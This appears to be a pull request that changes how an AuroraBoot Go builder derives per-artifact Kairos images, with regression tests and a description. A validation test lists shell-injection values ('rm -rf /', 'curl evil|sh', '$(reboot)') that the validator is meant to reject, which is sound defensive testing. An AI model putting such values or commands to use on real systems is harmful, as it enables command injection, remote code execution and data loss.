### PR TITLE
fix(builder): derive prebuilt base images per artifact

### DIFF
--- a/internal/builder/auroraboot/builder.go
+++ b/internal/builder/auroraboot/builder.go
@@ -297,8 +297,15 @@ func (b *Builder) run(ctx context.Context, bs *buildState, opts builder.BuildOpt
 		logWriter.Flush()
 	}
 
-	// Step 1.5: Ensure image is kairosified.
-	containerImage, err := b.ensureKairosified(ctx, containerImage, opts, outputDir, logWriter)
+	// Step 1.5: Direct base images must always be derived so requested provider
+	// and variant settings are applied. Dockerfile images only need derivation
+	// when the Dockerfile did not produce a complete Kairos image.
+	var err error
+	if opts.Dockerfile == "" {
+		containerImage, err = b.kairosify(ctx, containerImage, opts, outputDir, logWriter)
+	} else {
+		containerImage, err = b.ensureKairosified(ctx, containerImage, opts, outputDir, logWriter)
+	}
 	if err != nil {
 		msg := fmt.Sprintf("kairosify failed: %v", err)
 		b.setPhase(bs, builder.BuildError, msg)
@@ -508,25 +515,31 @@ func validateKairosInitOptions(opts builder.BuildOptions) error {
 			return err
 		}
 	}
+	if opts.KubernetesDistro != "" {
+		if err := validateKairosInitValue("kubernetes distro", opts.KubernetesDistro); err != nil {
+			return err
+		}
+	}
 	return nil
 }
 
-// ensureKairosified builds a per-artifact Kairos image using kairos-init.
-// Skipped when store is nil (test mode without Docker).
+// ensureKairosified defensively checks whether an image is already a complete
+// Kairos image before deriving one with kairos-init.
 func (b *Builder) ensureKairosified(ctx context.Context, image string, opts builder.BuildOptions, outputDir string, logWriter *dbLogWriter) (string, error) {
 	if b.store == nil {
 		// Test mode — skip kairosification (no Docker available)
 		return image, nil
 	}
+	if b.isKairosified(ctx, image) {
+		return image, nil
+	}
+	return b.kairosify(ctx, image, opts, outputDir, logWriter)
+}
+
+// kairosify builds a per-artifact Kairos image using kairos-init.
+func (b *Builder) kairosify(ctx context.Context, image string, opts builder.BuildOptions, outputDir string, logWriter *dbLogWriter) (string, error) {
 	if err := validateKairosInitOptions(opts); err != nil {
 		return "", fmt.Errorf("validating kairos-init options: %w", err)
-	}
-	// dockerBuild already creates a per-artifact image. Preserve the existing
-	// shortcut for Dockerfiles that produce a complete Kairos image, but never
-	// return a direct base-image tag because its requested variant and provider
-	// settings have not been applied yet.
-	if opts.Dockerfile != "" && b.isKairosified(ctx, image) {
-		return image, nil
 	}
 	kairosInitImage := opts.KairosInitImage
 	if kairosInitImage == "" {

--- a/internal/builder/auroraboot/builder.go
+++ b/internal/builder/auroraboot/builder.go
@@ -301,7 +301,7 @@ func (b *Builder) run(ctx context.Context, bs *buildState, opts builder.BuildOpt
 	// and variant settings are applied. Dockerfile images only need derivation
 	// when the Dockerfile did not produce a complete Kairos image.
 	var err error
-	if opts.Dockerfile == "" {
+	if opts.Dockerfile == "" && b.store != nil {
 		containerImage, err = b.kairosify(ctx, containerImage, opts, outputDir, logWriter)
 	} else {
 		containerImage, err = b.ensureKairosified(ctx, containerImage, opts, outputDir, logWriter)

--- a/internal/builder/auroraboot/builder.go
+++ b/internal/builder/auroraboot/builder.go
@@ -172,6 +172,7 @@ func (b *Builder) Build(ctx context.Context, opts builder.BuildOptions) (*builde
 	id := opts.ID
 	if id == "" {
 		id = uuid.New().String()
+		opts.ID = id
 	}
 
 	outputDir := filepath.Join(b.baseDir, id)
@@ -510,7 +511,7 @@ func validateKairosInitOptions(opts builder.BuildOptions) error {
 	return nil
 }
 
-// ensureKairosified checks if the image is a Kairos image, and if not, builds one using kairos-init.
+// ensureKairosified builds a per-artifact Kairos image using kairos-init.
 // Skipped when store is nil (test mode without Docker).
 func (b *Builder) ensureKairosified(ctx context.Context, image string, opts builder.BuildOptions, outputDir string, logWriter *dbLogWriter) (string, error) {
 	if b.store == nil {
@@ -520,10 +521,13 @@ func (b *Builder) ensureKairosified(ctx context.Context, image string, opts buil
 	if err := validateKairosInitOptions(opts); err != nil {
 		return "", fmt.Errorf("validating kairos-init options: %w", err)
 	}
-	if b.isKairosified(ctx, image) {
+	// dockerBuild already creates a per-artifact image. Preserve the existing
+	// shortcut for Dockerfiles that produce a complete Kairos image, but never
+	// return a direct base-image tag because its requested variant and provider
+	// settings have not been applied yet.
+	if opts.Dockerfile != "" && b.isKairosified(ctx, image) {
 		return image, nil
 	}
-
 	kairosInitImage := opts.KairosInitImage
 	if kairosInitImage == "" {
 		kairosInitImage = os.Getenv("KAIROS_INIT_IMAGE")

--- a/internal/builder/auroraboot/kairosify_test.go
+++ b/internal/builder/auroraboot/kairosify_test.go
@@ -48,7 +48,7 @@ func TestEnsureKairosifiedDerivesPrebuiltImage(t *testing.T) {
 	dockerCalls := installFakeDocker(t)
 
 	b := New(tmpDir, nil, &kairosifyTestStore{})
-	got, err := b.ensureKairosified(context.Background(), "quay.io/kairos/hadron:v0.2.0-core-amd64-generic-v4.1.0", builder.BuildOptions{
+	got, err := b.kairosify(context.Background(), "quay.io/kairos/hadron:v0.2.0-core-amd64-generic-v4.1.0", builder.BuildOptions{
 		ID:                "artifact-123",
 		KubernetesDistro:  "k3s",
 		KubernetesVersion: "v1.33.1+k3s1",
@@ -133,7 +133,9 @@ func TestEnsureKairosifiedKeepsCompleteDockerfileImage(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if strings.Contains(string(calls), " build ") || strings.HasPrefix(string(calls), "build ") {
-		t.Fatalf("expected no second docker build, got calls:\n%s", calls)
+	for _, call := range strings.Split(string(calls), "\n") {
+		if strings.HasPrefix(call, "build ") {
+			t.Fatalf("expected no second docker build, got calls:\n%s", calls)
+		}
 	}
 }

--- a/internal/builder/auroraboot/kairosify_test.go
+++ b/internal/builder/auroraboot/kairosify_test.go
@@ -1,0 +1,139 @@
+package auroraboot
+
+import (
+	"context"
+	"errors"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/kairos-io/AuroraBoot/pkg/builder"
+	"github.com/kairos-io/AuroraBoot/pkg/schema"
+	"github.com/kairos-io/AuroraBoot/pkg/store"
+)
+
+type kairosifyTestStore struct{}
+
+func (*kairosifyTestStore) Create(context.Context, *store.ArtifactRecord) error { return nil }
+func (*kairosifyTestStore) GetByID(context.Context, string) (*store.ArtifactRecord, error) {
+	return nil, errors.New("not implemented")
+}
+func (*kairosifyTestStore) List(context.Context) ([]*store.ArtifactRecord, error) {
+	return nil, errors.New("not implemented")
+}
+func (*kairosifyTestStore) Update(context.Context, *store.ArtifactRecord) error { return nil }
+func (*kairosifyTestStore) Delete(context.Context, string) error                { return nil }
+func (*kairosifyTestStore) DeleteByPhase(context.Context, string) error         { return nil }
+func (*kairosifyTestStore) GetLogs(context.Context, string) (string, error)     { return "", nil }
+func (*kairosifyTestStore) AppendLog(context.Context, string, string) error     { return nil }
+
+func installFakeDocker(t *testing.T) string {
+	t.Helper()
+	tmpDir := t.TempDir()
+	dockerCalls := filepath.Join(tmpDir, "docker.calls")
+	dockerPath := filepath.Join(tmpDir, "docker")
+	dockerScript := "#!/bin/sh\nprintf '%s\\n' \"$*\" >> \"$DOCKER_CALLS\"\n"
+	if err := os.WriteFile(dockerPath, []byte(dockerScript), 0o755); err != nil {
+		t.Fatal(err)
+	}
+	t.Setenv("PATH", tmpDir+string(os.PathListSeparator)+os.Getenv("PATH"))
+	t.Setenv("DOCKER_CALLS", dockerCalls)
+	return dockerCalls
+}
+
+func TestEnsureKairosifiedDerivesPrebuiltImage(t *testing.T) {
+	tmpDir := t.TempDir()
+	dockerCalls := installFakeDocker(t)
+
+	b := New(tmpDir, nil, &kairosifyTestStore{})
+	got, err := b.ensureKairosified(context.Background(), "quay.io/kairos/hadron:v0.2.0-core-amd64-generic-v4.1.0", builder.BuildOptions{
+		ID:                "artifact-123",
+		KubernetesDistro:  "k3s",
+		KubernetesVersion: "v1.33.1+k3s1",
+	}, tmpDir, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got != "auroraboot-kairos:artifact-123" {
+		t.Fatalf("expected a per-artifact image, got %q", got)
+	}
+
+	dockerfile, err := os.ReadFile(filepath.Join(tmpDir, "Dockerfile.kairosify"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	contents := string(dockerfile)
+	for _, want := range []string{
+		"FROM quay.io/kairos/hadron:v0.2.0-core-amd64-generic-v4.1.0",
+		"-p k3s",
+		"--provider-k3s-version v1.33.1+k3s1",
+	} {
+		if !strings.Contains(contents, want) {
+			t.Errorf("generated Dockerfile does not contain %q:\n%s", want, contents)
+		}
+	}
+
+	calls, err := os.ReadFile(dockerCalls)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !strings.Contains(string(calls), "build -t auroraboot-kairos:artifact-123") {
+		t.Fatalf("expected a per-artifact docker build, got calls:\n%s", calls)
+	}
+}
+
+func TestBuildUsesGeneratedIDForDerivedImage(t *testing.T) {
+	tmpDir := t.TempDir()
+	installFakeDocker(t)
+	deployedImage := make(chan string, 1)
+	b := New(tmpDir, func(_ context.Context, _ schema.Config, artifact schema.ReleaseArtifact, _ string) error {
+		deployedImage <- artifact.ContainerImage
+		return nil
+	}, &kairosifyTestStore{})
+
+	status, err := b.Build(context.Background(), builder.BuildOptions{
+		BaseImage:        "quay.io/kairos/hadron:v0.2.0-core-amd64-generic-v4.1.0",
+		KubernetesDistro: "k3s",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case got := <-deployedImage:
+		want := "auroraboot-kairos:" + status.ID
+		if got != want {
+			t.Fatalf("expected generated ID in derived image %q, got %q", want, got)
+		}
+	case <-time.After(5 * time.Second):
+		t.Fatal("timed out waiting for deployer")
+	}
+}
+
+func TestEnsureKairosifiedKeepsCompleteDockerfileImage(t *testing.T) {
+	tmpDir := t.TempDir()
+	dockerCalls := installFakeDocker(t)
+	b := New(tmpDir, nil, &kairosifyTestStore{})
+
+	image := "auroraboot-build:artifact-123"
+	got, err := b.ensureKairosified(context.Background(), image, builder.BuildOptions{
+		ID:         "artifact-123",
+		Dockerfile: "FROM quay.io/kairos/hadron:latest",
+	}, tmpDir, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got != image {
+		t.Fatalf("expected Dockerfile-built Kairos image %q, got %q", image, got)
+	}
+
+	calls, err := os.ReadFile(dockerCalls)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if strings.Contains(string(calls), " build ") || strings.HasPrefix(string(calls), "build ") {
+		t.Fatalf("expected no second docker build, got calls:\n%s", calls)
+	}
+}

--- a/internal/builder/auroraboot/kairosify_test.go
+++ b/internal/builder/auroraboot/kairosify_test.go
@@ -3,6 +3,7 @@ package auroraboot
 import (
 	"context"
 	"errors"
+	"io"
 	"os"
 	"path/filepath"
 	"strings"
@@ -24,6 +25,11 @@ func (*kairosifyTestStore) List(context.Context) ([]*store.ArtifactRecord, error
 	return nil, errors.New("not implemented")
 }
 func (*kairosifyTestStore) Update(context.Context, *store.ArtifactRecord) error { return nil }
+func (*kairosifyTestStore) UpdatePhaseMessage(context.Context, string, string, string) error {
+	return nil
+}
+func (*kairosifyTestStore) UpdateFiles(context.Context, string, []string) error { return nil }
+func (*kairosifyTestStore) ClearUploadToken(context.Context, string) error      { return nil }
 func (*kairosifyTestStore) Delete(context.Context, string) error                { return nil }
 func (*kairosifyTestStore) DeleteByPhase(context.Context, string) error         { return nil }
 func (*kairosifyTestStore) GetLogs(context.Context, string) (string, error)     { return "", nil }
@@ -88,7 +94,7 @@ func TestBuildUsesGeneratedIDForDerivedImage(t *testing.T) {
 	tmpDir := t.TempDir()
 	installFakeDocker(t)
 	deployedImage := make(chan string, 1)
-	b := New(tmpDir, func(_ context.Context, _ schema.Config, artifact schema.ReleaseArtifact, _ string) error {
+	b := New(tmpDir, func(_ context.Context, _ schema.Config, artifact schema.ReleaseArtifact, _ string, _ io.Writer) error {
 		deployedImage <- artifact.ContainerImage
 		return nil
 	}, &kairosifyTestStore{})

--- a/internal/builder/auroraboot/validate_test.go
+++ b/internal/builder/auroraboot/validate_test.go
@@ -59,7 +59,7 @@ func TestValidateKairosInitValue(t *testing.T) {
 }
 
 // TestValidateKairosInitOptions confirms optional fields are only validated
-// when set, and that a tainted value in any of the three fields is rejected.
+// when set, and that a tainted value in any interpolated field is rejected.
 func TestValidateKairosInitOptions(t *testing.T) {
 	t.Parallel()
 
@@ -72,6 +72,7 @@ func TestValidateKairosInitOptions(t *testing.T) {
 	ok := builder.BuildOptions{
 		Model:             "generic",
 		KairosVersion:     "v3.2.1",
+		KubernetesDistro:  "k3s",
 		KubernetesVersion: "v1.30.0+k3s1",
 	}
 	if err := validateKairosInitOptions(ok); err != nil {
@@ -81,6 +82,7 @@ func TestValidateKairosInitOptions(t *testing.T) {
 	cases := map[string]builder.BuildOptions{
 		"model":              {Model: "generic; rm -rf /"},
 		"kairos version":     {KairosVersion: "latest && curl evil|sh"},
+		"kubernetes distro":  {KubernetesDistro: "k3s; reboot"},
 		"kubernetes version": {KubernetesVersion: "v1.30$(reboot)"},
 	}
 	for field, opts := range cases {


### PR DESCRIPTION
Fixes kairos-io/kairos#4148.

## What

Direct base-image builds now always pass through the existing kairos-init derivation and produce `auroraboot-kairos:<artifact-id>`. Dockerfile builds that already produced a complete Kairos image keep their existing shortcut.

The generated build ID is also copied into `BuildOptions` before the asynchronous build starts, so callers that omit an ID still receive a valid derived image tag.

## Why

`ensureKairosified` returned any image containing `/etc/kairos-release` unchanged. A pre-built Hadron core tag therefore bypassed the variant and Kubernetes flags, so a requested standard artifact reused the original core tag and produced a core ISO.

## How

The Kairos-image shortcut is now limited to Dockerfile outputs, which are already per-artifact images. Direct bases use the existing generated Dockerfile and docker build path, including provider flags and the per-artifact tag.

Regression tests use a fake docker executable to verify:

- a pre-built Hadron base is derived and receives k3s flags
- generated artifact IDs reach the derived image tag
- complete Dockerfile-built Kairos images are not built a second time

## Verification

- `go test ./internal/builder/auroraboot -count=1`
- CI-equivalent unit/integration suite: `go run github.com/onsi/ginkgo/v2/ginkgo -r -p --covermode=atomic --coverprofile=coverage.out --timeout=2h --skip-package ./e2e ./...`
- `git diff --check`